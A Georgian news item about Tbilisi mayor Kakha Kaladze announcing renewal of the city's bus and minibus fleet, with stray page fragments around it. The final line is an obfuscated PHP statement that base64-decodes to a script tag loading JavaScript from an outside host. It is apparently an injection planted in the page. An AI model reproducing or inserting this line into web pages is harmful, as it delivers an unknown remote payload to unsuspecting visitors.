celsiusi
ავერსი შნაიდერი
თბილისის მერის კახა კალაძის განცხადებით, დედაქალაქში ყვითელი ავტობუსების პარკი სრულად განახლებულია. ამის შესახებ კახა კალაძემ ახალი 8-მეტრიანი ავტობუსების შემოყვანასთან დაკავშირებით გამართულ ღონისძიებაზე განაცხადა.
 
მისი თქმით, თბილისის მერია ავტოპარკის განახლებას გააგრძელებს.
 
„ჩვენ ამით არ შემოვიფარგლებით და მივიღეთ გადაწყვეტილება დამატებით 380 ავტობუსი შემოვიტანოთ, აქედან 180 იქნება 8-მეტრიანი ავტობუსები იქნება. დღეს 35 ერთეული შემოვიდა და ზეგიდან თბილისის მოსახლეობას მოემსახურება. დანარჩენი ავტობუსების თებერვლამდე შემოვა. მომავალ წელს ვაპირებთ 200 ერთეული 18-მეტრიანი ავტობუსები შევიძინოთ, რომელიც კონკრეტულ მარშრუტებზე იმოძრავებენ, რაც ქუჩების სივიწროვიდან გამომდინარეობს, რადგან ამ ზომის ავტობუსების გადაადგილება ყველგან შეუძლებელი იქნება“, - განაცხადა თბილისის მერობის კანდიდატმა კახა კალაძემ და დასძინა, რომ დედაქალაქში საზოგადოებრივი ტრანსპორტით გადაადგილების უზრუნველსაყოფად მიკროავტობუსებიც შემოვა, რადგან ყველა ქუჩაზე დიდი ავტობუსების გადაადგილება შეუძლებელია.
 
"დედაქალაქში 600 მიკროავტოვბუსი იმოძრავებს. დღეს წარმოგიდგენთ 300 ახალ მიკროავტობუსს და წლის ბოლომდე ე.წ. ყვითელი მარშრუტკები სრულად განახლდება", - განმარტა კალაძემ.  
1157
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");